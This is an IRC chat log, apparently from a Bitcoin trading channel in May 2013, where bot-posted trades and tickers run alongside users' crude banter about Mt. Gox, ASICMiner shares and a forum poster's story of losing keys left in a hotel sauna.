mtgox also cannot be touched under US laws, ie, I cannot sue them for a breach of security May 14 23:00:07 I dont know why ANYONE does business with mtgox May 14 23:00:09 it makes no sense May 14 23:00:19 someone just sold a shitload May 14 23:00:22 instaed of buying May 14 23:00:24 wrong way. May 14 23:00:44 truffles: in the US and EU, you MUST secure customer data May 14 23:00:46 period May 14 23:00:47 its the law May 14 23:00:58 if you get caught not doing that, you are fined out your ass May 14 23:01:06 up to the point, small businesses go bankrupt May 14 23:01:18 truffles: nope, you cant pay them off May 14 23:01:28 [HAVELOCK] [ASICM] 25 @ 0.01687999 = 0.422 BTC [+] May 14 23:01:33 the US has even fined companies like BoA for losing customer data May 14 23:01:34 selloff on gox May 14 23:01:40 ;;goxlag May 14 23:01:43 people will crash gix for anything it seems May 14 23:01:44 MtGox lag is 39.868904 seconds. During this time, light travels 0.0798968372215 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). May 14 23:01:44 and BoA pays off EVERYONE May 14 23:01:53 even if it means being stuck in cash May 14 23:02:00 "you" can't pay them off, truffles May 14 23:02:08 massive corporations can, though. May 14 23:02:12 benkay: if BoA cant, who can? May 14 23:02:25 that's not corruption, that's compliance :) May 14 23:02:42 "we are too big to fail and too incompetent to implement this. how much do we have to pay? May 14 23:02:43 higher? they're the third largest bank in the world. May 14 23:02:43 " May 14 23:03:03 [HAVELOCK] [ASICM] 25 @ 0.01688 = 0.422 BTC [+] May 14 23:03:10 (citi, chase are 1 and 2, hsbc is 4) May 14 23:04:10 citi and chase iirc have both also paid fines May 14 23:04:19 truffles: customer data security May 14 23:04:28 ;;ticker May 14 23:04:29 BTCUSD ticker | Best bid: 112.51000, Best ask: 113.00000, Bid-ask spread: 0.49000, Last trade: 113.00000, 24 hour volume: 43011.94624705, 24 hour low: 112.71496, 24 hour high: 119.80002, 24 hour vwap: 117.29708 May 14 23:04:29 the government takes those fines very seriously May 14 23:04:41 ;;bids 101 May 14 23:04:45 There are currently 28530.865 bitcoins demanded at or over 101.0 USD, worth 3058167.41481 USD in total. | Data vintage: 0.0060 seconds May 14 23:05:56 nonsense. May 14 23:06:14 they take their fines unrelatedly to whatever they're notionally supposed to do May 14 23:06:23 what they're supposed to do has nothing to do with what they actually do May 14 23:07:35 hey check this out May 14 23:07:37 ;;goxlag May 14 23:07:38 MtGox lag is 75.984144 seconds. During this time, light travels 0.152271373815 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). May 14 23:07:59 and ;;ticker --last May 14 23:08:02 ;;ticker --last May 14 23:08:02 110.26854 May 14 23:08:03 [HAVELOCK] [ASICM] 150 @ 0.01688 = 2.532 BTC [+] May 14 23:08:19 any bitcoin news at all and the gox engine shits itself May 14 23:08:51 [BTCTC] [COGNITIVE] 2 @ 0.2233 = 0.4466 BTC [-] May 14 23:09:35 that's a pretty trivial conclusion... May 14 23:09:51 [BTCTC] [TAT.ASICMINER] 42 @ 0.017 = 0.714 BTC [+] May 14 23:09:52 [BTCTC] [COGNITIVE] 4 @ 0.223316 = 0.8933 BTC [+] May 14 23:10:02 [BTCTC] [TAT.ASICMINER] 14 @ 0.01709 = 0.2393 BTC [+] May 14 23:10:08 [BTCTC] [TAT.ASICMINER] 52 @ 0.017189 = 0.8938 BTC [+] May 14 23:10:17 toplogically identical to "if fewer people traded on gox it wouldn't have the lag problems it does" May 14 23:10:29 nah May 14 23:10:38 [BTCTC] [TAT.ASICMINER] 82 @ 0.01719 = 1.4096 BTC [+] May 14 23:10:43 if the traffic went elsewhere the lag would decrease May 14 23:10:46 on gox May 14 23:10:51 [BTCTC] [TAT.ASICMINER] 80 @ 0.017289 = 1.3831 BTC [+] May 14 23:10:56 oh wait May 14 23:11:16 i forgot how much i'd have to explain for this to be a worthwhile conversation for a second May 14 23:11:34 [BTCTC] [TAT.ASICMINER] 100 @ 0.01729 = 1.729 BTC [+] May 14 23:12:15 [BTCTC] [COGNITIVE] 1 @ 0.225 BTC [+] May 14 23:12:52 ;;ticker May 14 23:12:53 BTCUSD ticker | Best bid: 111.66337, Best ask: 111.99000, Bid-ask spread: 0.32663, Last trade: 111.99000, 24 hour volume: 53895.50132168, 24 hour low: 109.42198, 24 hour high: 119.80002, 24 hour vwap: 116.04770 May 14 23:13:24 [BTCTC] [COGNITIVE] 1 @ 0.225 BTC [+] May 14 23:13:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.017349 BTC [+] May 14 23:14:52 [BTCTC] [COGNITIVE] 2 @ 0.238 = 0.476 BTC [+] May 14 23:20:58 clearly satoshi new when to disappear May 14 23:21:06 knew* May 14 23:22:03 [BTCTC] [TAT.ASICMINER] 30 @ 0.0173 = 0.519 BTC [-] May 14 23:22:43 [BTCTC] [TAT.ASICMINER] 77 @ 0.0173 = 1.3321 BTC [-] May 14 23:22:54 lol May 14 23:23:30 [BTCTC] [ASICMINER-PT] 1 @ 1.749999 BTC [-] May 14 23:24:33 [BTCTC] [ASICMINER-PT] 1 @ 1.75 BTC [+] May 14 23:26:14 [BTCTC] [ASICMINER-PT] 3 @ 1.75 = 5.25 BTC [+] May 14 23:27:31 [BTCTC] [TAT.ASICMINER] 52 @ 0.01725 = 0.897 BTC [-] May 14 23:28:14 [BTCTC] [TAT.ASICMINER] 48 @ 0.01725 = 0.828 BTC [-] May 14 23:28:27 [BTCTC] [TAT.ASICMINER] 93 @ 0.0173 = 1.6089 BTC [+] May 14 23:29:37 [BTCTC] [TAT.ASICMINER] 112 @ 0.017348 = 1.943 BTC [+] May 14 23:29:42 [BTCTC] [TAT.ASICMINER] 48 @ 0.017349 = 0.8328 BTC [+] May 14 23:31:23 [BTCTC] [TAT.ASICMINER] 29 @ 0.017349 = 0.5031 BTC [+] May 14 23:31:47 [BTCTC] [TAT.ASICMINER] 18 @ 0.017355 = 0.3124 BTC [+] May 14 23:32:14 [BTCTC] [ASICMINER-PT] 1 @ 1.700001 BTC [-] May 14 23:33:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.017348 = 0.0347 BTC [-] May 14 23:33:57 [BTCTC] [ASICMINER-PT] 1 @ 1.73989 BTC [+] May 14 23:35:05 heh May 14 23:35:10 I think this is the problem May 14 23:35:26 Current BTC balance: ~630 May 14 23:35:35 Balance: 31.30259848 BTC May 14 23:35:45 ? May 14 23:35:50 Current BTC balance: ~200 May 14 23:36:03 dev team has no incentive to unfuck bitcoin May 14 23:36:06 devs be poor? May 14 23:36:40 [BTCTC] [ASICMINER-PT] 1 @ 1.73999 BTC [+] May 14 23:37:05 Garzik has had a Avalon since January - I do not think he is poor May 14 23:37:06 i thought they had at least 10 times that. May 14 23:37:10 garzik is poor my ASS May 14 23:37:31 more like 10-100 times. May 14 23:38:38 [BTCTC] [ASICMINER-PT] 1 @ 1.737 BTC [-] May 14 23:38:51 (13:35) < dub> Balance: 31.30259848 BTC << lol May 14 23:39:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.017122 = 0.0514 BTC [-] May 14 23:39:29 BTCUSD ticker | Best bid: 112.85002, Best ask: 112.97000, Bid-ask spread: 0.11998, Last trade: 112.97000, 24 hour volume: 63165.98317902, 24 hour low: 109.42198, 24 hour high: 119.80002, 24 hour vwap: 115.68728 May 14 23:39:42 3472 May 14 23:41:27 [BTCTC] [ASICMINER-PT] 1 @ 1.737 BTC [-] May 14 23:44:03 [BTCTC] [TAT.ASICMINER] 5 @ 0.017122 = 0.0856 BTC [-] May 14 23:51:54 i believe it. May 14 23:56:40 [BTCTC] [ASICMINER-PT] 1 @ 1.670523 BTC [-] May 14 23:58:33 [BTCTC] [S.DICE-PT] 2 @ 0.00357 = 0.0071 BTC [-] May 15 00:05:02 [HAVELOCK] [ASICM] 50 @ 0.0168 = 0.84 BTC [-] May 15 00:08:32 le pricedrop face May 15 00:08:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0168 BTC [-] May 15 00:08:54 ;;ticker May 15 00:08:55 BTCUSD ticker | Best bid: 115.80001, Best ask: 116.00000, Bid-ask spread: 0.19999, Last trade: 115.80001, 24 hour volume: 68069.54565023, 24 hour low: 109.42198, 24 hour high: 119.80002, 24 hour vwap: 115.60158 May 15 00:09:02 not particularly dropped is it May 15 00:09:14 best proof that mtgox doesn't really matter one could imagine. May 15 00:09:57 the money hasn't run out on gox yet May 15 00:10:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.016603 = 0.4151 BTC [-] May 15 00:10:02 [HAVELOCK] [ASICM] 284 @ 0.0164 = 4.6576 BTC [-] May 15 00:10:03 [HAVELOCK] [ASICM] 16 @ 0.01630001 = 0.2608 BTC [-] May 15 00:11:22 [BTCTC] [ASICMINER-PT] 1 @ 1.68 BTC [+] May 15 00:12:13 yea May 15 00:12:17 but it made a spike down May 15 00:12:27 it seems big because it was so slow recently May 15 00:13:24 ;;bids 0 May 15 00:13:24 There are currently 34961656 bitcoins demanded at or over 0.0 USD, worth 19541810.9541 USD in total. | Data vintage: 116.5149 seconds May 15 00:15:59 [BTCTC] [ASICMINER-PT] 2 @ 1.64002 = 3.28 BTC [-] May 15 00:16:38 [BTCTC] [ASICMINER-PT] 1 @ 1.601 BTC [-] May 15 00:16:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.0166 = 0.0332 BTC [-] May 15 00:16:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0165 BTC [-] May 15 00:16:45 [BTCTC] [ASICMINER-PT] 1 @ 1.6 BTC [-] May 15 00:16:54 [BTCTC] [TAT.ASICMINER] 25 @ 0.016251 = 0.4063 BTC [-] May 15 00:17:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.01625 BTC [-] May 15 00:17:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.016249 = 0.0325 BTC [-] May 15 00:17:37 [BTCTC] [TAT.ASICMINER] 64 @ 0.0162 = 1.0368 BTC [-] May 15 00:18:03 [HAVELOCK] [ASICM] 284 @ 0.0166 = 4.7144 BTC [+] May 15 00:19:24 [HAVELOCK] [HIM] 4 @ 2.23 = 8.92 BTC [+] May 15 00:21:03 [HAVELOCK] [ASICM] 75 @ 0.0164 = 1.23 BTC [-] May 15 00:21:04 [HAVELOCK] [ASICM] 211 @ 0.016587 = 3.4999 BTC [+] May 15 00:21:05 [HAVELOCK] [ASICM] 14 @ 0.0165 = 0.231 BTC [-] May 15 00:21:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.016 = 0.032 BTC [-] May 15 00:24:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.01679 = 0.084 BTC [+] May 15 00:25:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.015601 = 0.156 BTC [-] May 15 00:26:10 [BTCTC] [TAT.ASICMINER] 20 @ 0.0156 = 0.312 BTC [-] May 15 00:26:12 [BTCTC] [ASICMINER-PT] 1 @ 1.560001 BTC [-] May 15 00:26:41 [BTCTC] [TAT.ASICMINER] 12 @ 0.0151 = 0.1812 BTC [-] May 15 00:26:45 [BTCTC] [ASICMINER-PT] 1 @ 1.56 BTC [-] May 15 00:27:01 [BTCTC] [ASICMINER-PT] 5 @ 1.551 = 7.755 BTC [-] May 15 00:27:03 [HAVELOCK] [ASICM] 9 @ 0.0165 = 0.1485 BTC [-] May 15 00:27:28 [BTCTC] [ASICMINER-PT] 1 @ 1.5502 BTC [-] May 15 00:27:34 [BTCTC] [ASICMINER-PT] 58 @ 1.55 = 89.9 BTC [-] May 15 00:30:01 [HAVELOCK] [ASICM] 100 @ 0.0164 = 1.64 BTC [-] May 15 00:30:03 [HAVELOCK] [ASICM] 200 @ 0.01600001 = 3.2 BTC [-] May 15 00:30:04 [HAVELOCK] [ASICM] 1000 @ 0.016 = 16 BTC [-] May 15 00:30:05 [HAVELOCK] [ASICM] 50 @ 0.0156 = 0.78 BTC [-] May 15 00:37:07 so May 15 00:37:16 what you think bout that homeland security deal? May 15 00:37:39 buy btc May 15 00:37:41 cash otu of gox May 15 00:38:13 well there's still plain wire May 15 00:38:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.016789 = 0.1679 BTC [+] May 15 00:39:49 bitcoin is for trrsts May 15 00:41:01 [HAVELOCK] [ASICM] 2 @ 0.0165 = 0.033 BTC [+] May 15 00:41:26 My take on Gox news, is that gox was a grey currency market for USD -> BTC. Predicting as a result of DHS trying to stop currency conversion, that the market will bifurcate, into regulated exchanges and balck exchange. My sense if history is anything to go on, that prices will be better on black exchanges.. and will eventually make up much of the volume. May 15 00:42:12 in the interim, $2 coins May 15 00:42:19 hurray! May 15 00:44:17 Just bought 0.02 ASICM shares. May 15 00:44:18 Actually no $2 coins. The reality is that those who US folks with stakes in btc are the lucky ones who got in before it got a lot harder. May 15 00:44:57 Willdude123: you call the hookers, I'll get some blow May 15 00:45:25 What? May 15 00:45:33 Haha May 15 00:45:51 Is a hooker the same as a prostitute? May 15 00:46:14 ;;wp hooker May 15 00:46:15 http://en.wikipedia.org/wiki/Hooker | Hooker may refer to: Contents. 1 People; 2 Places; 3 Sport; 4 Other. People. Hooker (surname) · Hooker Jim (1851–1879), Modoc (Native American) warrior ... May 15 00:54:56 Who runs gribble? May 15 00:55:07 ::help May 15 00:55:16 ;:help May 15 00:55:23 that'd be nanotube May 15 00:55:27 try bitcoin-otc May 15 00:55:36 ;;help May 15 00:55:37 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ May 15 00:55:41 Finally. May 15 00:55:52 ! is assbots domain fyi. May 15 00:56:01 use ;; for gribble May 15 00:56:11 It's just it'd make more sense to use enwp.org May 15 00:57:22 The sauna WAS the "security room" of the conference...I DID NOT leave my computer + the keys + 2 factor auth there for the reason that I was stupid, but for the reason that it was designated to be the MOST SECURE place, with higher rating than the hotel room.. May 15 00:57:44 Uhuh May 15 00:57:52 lols May 15 00:57:55 lolwtf May 15 00:58:20 no comment May 15 00:58:25 there are only so many places to hide your Yubikey in the Sauna May 15 00:58:44 lol May 15 00:59:28 Hey guys, lets play hide the Yubikey OK, not gay or anything this is for national security May 15 00:59:45 bgupta i guess you didn't read http://trilema.com/2012/the-politics-of-bitcoin/ back in 2012 May 15 01:00:13 seeing how you're stuck predicting things months after they happened already or some shit. May 15 01:01:28 jurov his keys got steamed ? May 15 01:02:38 Is 0.0165 a bit too much to bit for an ASICminer share? May 15 01:02:42 apparently. oh and as a result he decided promptly to: "I will not do anything." May 15 01:02:57 Bought them now. May 15 01:03:30 Willdude123, leave it at "yes". May 15 01:03:42 Heh. May 15 01:03:50 It's not too much of a problem. May 15 01:03:56 i hope so May 15 01:04:02 I wanted them quick though. May 15 01:04:16 Is tomorrow when the divs are paid? May 15 01:05:07 usually on wednesdays yeah May 15 01:05:41 Not gonna say I didn't see it coming… as I did and deliberately decided to be on the correct side of history. If more than one person came to the same conclusion at different points in time, more power to em. May 15 01:06:37 jurov so basically his way of becoming relevant in BTC is claiming he used to have bitcoins at some point before the sauna. May 15 01:06:47 lol May 15 01:06:53 LOL May 15 01:07:05 no he's the first one to use bitcoins in sauna May 15 01:07:17 actually i have a sauna and used btc in it so notrly. May 15 01:07:20 and to use sauna as security room May 15 01:07:23 rub and tug gone bad? May 15 01:07:26 now that is true. May 15 01:07:48 i don't think anyone even heard of the steamy security room before. May 15 01:08:00 Good for electronics May 15 01:08:11 sauna darkroom yes. sauna security room is like sauna fridge room May 15 01:09:11 So I guess with his $9 mill, he could not afford a body gurad? May 15 01:09:14 guard May 15 01:09:23 [BTCTC] [B.YABMC] 30 @ 0.017 = 0.51 BTC [-] May 15 01:09:43 Will higher divs mean higher demand so a higher share price? May 15 01:10:15 jborkl bootyguard was bussy May 15 01:10:25 lol May 15 01:10:31 true May 15 01:10:52 Willdude123: theoretically yes, but satoshidice disproved it several times May 15 01:11:02 What's this sauna thing about? May 15 01:11:20 this: https://bitcointalk.org/index.php?topic=174620.msg2145968#msg2145968 May 15 01:12:13 there's just one place to hide btc in a sauna. here: http://www.usmbooks.com/cyanide_capsule.html May 15 01:12:56 I'm still confused? May 15 01:13:08 So what happened to the bitcoins in the sauna? May 15 01:13:49 they got sweaty. May 15 01:13:49 Lol, that guy is such a asshat May 15 01:13:53 hahaha, jacko is wacko May 15 01:14:20 Well, he is a donator and hero member May 15 01:14:22 omg that guy needs to stfu May 15 01:14:22 LOLOLO May 15 01:14:44 So. May 15 01:14:48 smh May 15 01:14:57 He left private keys in a sauna? May 15 01:15:04 apparently so May 15 01:15:10 Were they lost by the staff? Stolen? May 15 01:15:15 im still stuck wtfing at "which in a 5-star hotel means that you run out of water in 2 hours, followed by evacuation since you are not in a position to run a supernode without water, and risk a danger of breakdown" May 15 01:15:40 lol May 15 01:15:44 Well , bitcoind on his laptop needs a lot of attention May 15 01:15:50 I think this dude is a supertroll May 15 01:15:57 yeah, i've got nothin May 15 01:16:11 its just crazy talk May 15 01:17:46 So was the private key on a laptop? May 15 01:18:00 Why leave it in an unguarded sauna? May 15 01:18:08 it was DESIGNATED May 15 01:18:09 as secure May 15 01:18:10 [BTCTC] [ASICMINER-PT] 1 @ 1.6002 BTC [+] May 15 01:18:14 you don't understand roleplay do you ? May 15 01:18:45 oh no May 15 01:18:51 I see. May 15 01:18:54 I've actually never come across a fin that wasnt a fucktard May 15 01:18:55 Is he suing? May 15 01:18:58 victims of their own danger of breakdown May 15 01:19:14 it looks like he deleted his post asking for asylum May 15 01:19:15 incidentally, i thought running water was mandatory for 2 star classification. May 15 01:19:27 [BTCTC] [ASICMINER-PT] 7 @ 1.6 = 11.2 BTC [-] May 15 01:19:33 haha May 15 01:20:00 [BTCTC] [S.MPOE-PT] 2 @ 0.00065 = 0.0013 BTC [-] May 15 01:20:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.016011 = 0.1601 BTC [-] May 15 01:20:34 from memory: the country should be natural, 20-30 celcius, organic food, and room for 5-20 May 15 01:20:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.01601 BTC [-] May 15 01:20:56 room from 5-20 ? whats that ? May 15 01:21:02 Doesn't Romania fit that description? May 15 01:21:13 romania doesn't grand asylum to fucktards. May 15 01:21:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.015999 BTC [-] May 15 01:21:26 5-20 of his entourage May 15 01:21:34 [BTCTC] [ASICMINER-PT] 1 @ 1.58 BTC [-] May 15 01:21:38 wait. the country shouldhave room for 20 people ? May 15 01:21:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.0155 BTC [-] May 15 01:21:46 or 5. it's ok, they squeeze in ? May 15 01:21:54 whoever gives him asylum May 15 01:22:14 [BTCTC] [TAT.ASICMINER] 20 @ 0.01521 = 0.3042 BTC [-] May 15 01:22:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0152 BTC [-] May 15 01:22:32 which country doesn't have room for 20 people ? tuvalu ? May 15 01:22:37 [BTCTC] [TAT.ASICMINER] 8 @ 0.0151 = 0.1208 BTC [-] May 15 01:22:41 no, sealand May 15 01:22:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0151 BTC [-] May 15 01:22:53 https://www.google.com/search?q=sauna+photo&tbm=isch&tbo=u&source=univ&sa=X&ei=wLiSUYCvLMnN0AHJnYCYAg&ved=0CDQQsAQ&biw=1920&bih=979#imgrc=IR7Gf5E6z224NM%3A%3BkMNMqnSbcg3b_M%3Bhttp%253A%252F%252Fwww.zenithholidays.co.uk%252Fuploads%252Fimages%252Fzellamsee%252Fhotel_tauernstueberl%252Fsauna.jpg%3Bhttp%253A%252F%252Fwww.zenithholidays.co.uk%252Faustria%252Fzell-am-see-winter%252Fhotel-tauernstuberl% May 15 01:22:53 252F%3B1000%3B666 May 15 01:23:03 i guess vatican city is only like 0.3 sq km May 15 01:23:20 [BTCTC] [ASICMINER-PT] 1 @ 1.560001 BTC [-] May 15 01:23:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.015 = 0.15 BTC [-] May 15 01:23:35 https://www.google.com/search?biw=1113&bih=762&tbm=isch&sa=1&q=sauna+laptop&oq=sauna+laptop&gs_l=img.3...6168.9145.0.9377.12.9.3.0.0.0.245.1234.2j5j1.8.0...0.0...1c.1.12.img.71ykfbFclCc May 15 01:23:56 i think that last search explains a lot May 15 01:25:49 https://bitcointalk.org/index.php?topic=205396.msg2149432#msg2149432 May 15 01:25:52 i approve of this message. May 15 01:27:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.016504 = 0.033 BTC [+] May 15 01:27:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.016788 = 0.0336 BTC [+] May 15 01:28:48 [BTCTC] [TAT.ASICMINER] 12 @ 0.016788 = 0.2015 BTC [+] May 15 01:29:03 [HAVELOCK] [ASICM] 6 @ 0.0164 = 0.0984 BTC [-] May 15 01:29:04 [HAVELOCK] [ASICM] 6 @ 0.0164 = 0.0984 BTC [-] May 15 01:31:07 that's easy to approve if you don't need to cash out May 15 01:31:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.016788 = 0.0336 BTC [+] May 15 01:32:07 [BTCTC] [PAJKA.BOND] 3 @ 0.1033 = 0.3099 BTC [-] May 15 01:32:12 today just got email from my llc consultant that they want to consider me as financial service and bank May 15 01:32:12 [BTCTC] [TAT.ASICMINER] 24 @ 0.016788 = 0.4029 BTC [+] May 15 01:32:30 [BTCTC] [PAJKA.BOND] 9 @ 0.1031 = 0.9279 BTC [-] May 15 01:32:46 [BTCTC] [PAJKA.BOND] 5 @ 0.1031 = 0.5155 BTC [-] May 15 01:32:51 have yet to research what does that mean May 15 01:32:57 jurov nothing good. May 15 01:33:16 [BTCTC] [PAJKA.BOND] 100 @ 0.103 = 10.3 BTC [-] May 15 01:33:17 so wait. May 15 01:33:18 "I have pretty many coins and I store them with pretty many precautions. By many, I mean that it takes me an approximately 16 hours of my prime work time to do it, and it also does not happen without a considerable monetary cost." May 15 01:33:26 it takes him 16 hours of labour to go through the sauna ? May 15 01:36:15 cuz he's pretty May 15 01:36:28 a right. May 15 01:36:36 I had planned for an overkill in all respects, so my organization worked pretty well because of the extra capacity, even after the hotel turned hostile after the CEO refused to acknowledge that they had blown it (and he still lives in his denial afaik). May 15 01:36:45 dude this is the best the internet has to offer. May 15 01:37:06 yea, am saying since quite some time May 15 01:37:40 yeah. May 15 01:37:58 "Certainly it was not the hotel staff, they just left the door open in the middle of the night for anyone to walk in. Which is pretty lame considering that they had turned down my plea to have a 24-hour guard," May 15 01:38:04 who pleas with the hotel staff ffs ?! May 15 01:39:35 you gettin trolled May 15 01:39:52 we need this guy in -trollbox statte May 15 01:41:47 i think so yeah May 15 01:42:05 It is happening - organizations are being paralyzed in front of our very eyes, unable to even tell me, how exactly I should pay their bill (of 10,000 EUR), and in which order I can deduct the amount compromised, lost or stolen (up to 10,000,000 EUR) because of their criminal negligence. May 15 01:42:19 My Gox account: Your wallet: 0.00009999 BTC, $11.89085 May 15 01:42:26 sad day, major losses May 15 01:42:28 tbh while it'd be great if this was a display of sheer skill coming from a stable individual May 15 01:42:45 it seems a lot more likey he's simply unhinged. May 15 01:42:51 ThickAsThieves ? May 15 01:43:17 Now they are holding hostage to some of my and my family's personal items, causing a great annoyance to us (with no offsetting gain to them), and reducing our ability to proceed with the investigation (as I need to buy new suits to keep me supplied, and constantly write here, both with the time I could more profitably use for my bitcoin accounting) May 15 01:43:23 bwahahah wait they took his clothes ?! May 15 01:44:00 have billed my credit card unauthorized to the value of 3,000 EUR, and the several silk suits in Manor Hotel Suite #30 act as a countertestimony to their wishful thinking that nothing would ever have happened. May 15 01:44:07 im screenshooting all this. May 15 01:44:16 tbh, if I was anywhere near this clown I'd have robbed him too May 15 01:44:21 hehe just saying i have 9999 satoshis and $12 stuck in Gox May 15 01:44:42 ThickAsThieves: you're Willdude123 rich May 15 01:45:12 think of all the tat.asicminer i couldve bought May 15 01:45:17 What? May 15 01:45:22 lol May 15 01:45:25 lol May 15 01:45:41 dub i wouldn't have, but i'd have ordered someone do it. May 15 01:45:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.016679 = 0.1668 BTC [-] May 15 01:46:16 Willdude, did you ever buy AM shares? May 15 01:46:22 with your mom's $50? May 15 01:46:58 [17:43] --- Willdude123 [~george1@wikipedia/W-D] has joined #bitcoin-assets May 15 01:46:59 aww stop picking on the guy May 15 01:47:01 [17:44] Just bought 0.02 ASICM shares. May 15 01:47:06 my mom is being a total bitch about this $12 stuck in Gox May 15 01:47:39 .02? May 15 01:48:33 "This fiasco happened in the atmosphere of relaxedness without the lightest malice from my part - quite the contrary - everybody who was there can prove my dedication towards making this thing the best in their lives. I don't think the organizations of evil can do any better, if even the organizations of good (such as Vuoristo-Yhtiöt and their Haikko Manor) fail to remain operative when the reality hits them too hard." May 15 01:48:41 i wonder who the organisations of evil are ? May 15 01:48:54 CIA is mentioned earlier May 15 01:49:13 this is paraniod schizo stuff May 15 01:49:23 i wonder sometimes if reptilia is just trolling this channel mainly May 15 01:49:28 you guys love him May 15 01:49:36 "Charlotta, Mikke, Sakke, Anne, Janne. " May 15 01:49:37 'the doorknobs are out to get me' May 15 01:49:45 why would he do it? May 15 01:49:50 dude. mpoe-pr was right ?! the girls in the pic were in fact hotel stafdf ? May 15 01:49:52 why would you care? May 15 01:50:13 i cant even grasp what the guys is even pretending to do May 15 01:50:18 other than be wacky May 15 01:50:23 that's what's so fascinating about it May 15 01:50:34 he's like usagi on rails May 15 01:50:35 ThickAsThieves:Are you the founder of ASICM? May 15 01:50:52 yessir May 15 01:51:01 How old are you? May 15 01:51:08 ThickAsThieves is antonio banderas irl May 15 01:51:11 old enough May 15 01:51:16 interested? May 15 01:51:23 In? May 15 01:51:50 Well, you show annoyance at your mum so I guess you're under 18. May 15 01:52:02 Shit, you aint even old enough to smoke. May 15 01:52:03 hahahahaha May 15 01:52:06 mom's are annoying your life May 15 01:52:16 Willdude123 he's married or something ; he runs the TAT pt's on asicminer. May 15 01:52:17 i hate to break it to you May 15 01:52:26 Lol. May 15 01:52:39 So your mum is being a bitch then? May 15 01:52:41 he's married.. to your mom May 15 01:52:43 actually my mom is pretty cool May 15 01:52:55 she doesnt even know i bitcoin this hard May 15 01:53:10 she thinks i'm growing my business or some shit May 15 01:53:12 bitches don't know about my bitcoinz May 15 01:53:16 You said she was a bitch. May 15 01:53:22 my mom is coinowner for over a year now ;) May 15 01:53:31 About $12 in mt gox May 15 01:53:37 my mom got my ipad May 15 01:53:40 Why would she be? Lol May 15 01:53:43 Uhuh May 15 01:53:44 she wasnt May 15 01:53:47 i was kidding May 15 01:53:56 Uhuh May 15 01:53:58 sorry May 15 01:54:06 i know you dont like my jokes May 15 01:54:15 but i'm not a professional comedian May 15 01:54:21 so it's not my fault May 15 01:54:23 :-) May 15 01:54:23 this insults are not up to par with -assets cmon try harder May 15 01:54:39 i dont wanna insult the kid May 15 01:54:46 we'll alienate him soon enough May 15 01:55:25 maybe you'll like him more than reptilia May 15 01:55:34 doubtful. May 15 01:55:37 indeed May 15 01:55:38 i really like reptila May 15 01:55:41 lol May 15 01:56:02 plus, he's a shareholder! May 15 01:56:09 dude knows what's up May 15 01:56:11 so basically his complaint boils down to this : the hotel charged him more than he imagined will be charged ; the staff cleanned the sauna. May 15 01:56:29 this would be the prima facie reality upon which his complex and convoluted icing is then placed. May 15 01:56:32 http://static.iltalehti.fi/uutiset/13549021_uu.jpg May 15 01:56:34 wat May 15 01:56:57 pay the bill with btc, cc or silver pottery May 15 01:56:59 if he only had a heart May 15 01:57:07 lol May 15 01:57:15 can not pay in forum nuttery ? May 15 01:57:35 it only has 5 legs May 15 01:57:38 dub: ikr May 15 01:57:55 or was it 7 May 15 01:58:45 dub pm's me once a week asking if i'm buying shares, then silence. I think he's just keeping tabs on me. May 15 02:00:18 you never respond May 15 02:01:32 [17:25] are you buying AM? May 15 02:01:32 [17:26] yessir May 15 02:01:32 [17:26] how many you looking to unload? May 15 02:01:32 [17:49] lol May 15 02:01:32 [17:49] you do this every time May 15 02:01:48 ThickAsThieves if he's not on by the time you respond you just get a freenode notice. May 15 02:01:50 use gribble May 15 02:02:11 ThickAsThieves: I'm -R now :) May 15 02:02:18 bwaahahaha May 15 02:02:22 hehe May 15 02:02:24 ok dub you nub... May 15 02:02:28 [MPEX] [S.BBET] 35 @ 0.0015 = 0.0525 BTC [-] May 15 02:03:22 i just figured he was unsure if he actually wanted to sell May 15 02:04:27 ;;getrating dub May 15 02:04:27 WARNING: Currently not authenticated. User dub, rated since Wed Dec 19 15:09:17 2012. Cumulative rating 4, from 4 total ratings. Received ratings: 4 positive, 0 negative. Sent ratings: 8 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=dub May 15 02:04:58 !ticker bc ASICMINER-PT May 15 02:04:59 I don't know those people, and they don't look very friendly. May 15 02:05:05 !ticker bt ASICMINER-PT May 15 02:05:07 [BTCT:ASICMINER-PT] 1D: 1.522746 / 1.66735 / 1.78 (521 shares, 868.7 BTC), 7D: 1.24 / 1.48112 / 1.78 (3486 shares, 5163.2 BTC), 30D: 0.79 / 1.30057 / 1.78 (8684 shares, 11294.1 BTC) May 15 02:06:03 [MPEX] [S.BBET] 365 @ 0.0015 = 0.5475 BTC [-] May 15 02:06:43 [MPEX] [S.MPOE] 1000 @ 0.00068707 = 0.6871 BTC [+] May 15 02:09:37 [BTCTC] [TAT.ASICMINER] 19 @ 0.016679 = 0.3169 BTC [-] May 15 02:11:25 is this the beginning of the bear May 15 02:13:12 [BTCTC] [TAT.ASICMINER] 30 @ 0.016679 = 0.5004 BTC [-] May 15 02:25:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.016679 BTC [-] May 15 02:26:02 [HAVELOCK] [VTX] 1 @ 0.4646 BTC [-] May 15 02:26:33 [BTCTC] [TAT.ASICMINER] 29 @ 0.016679 = 0.4837 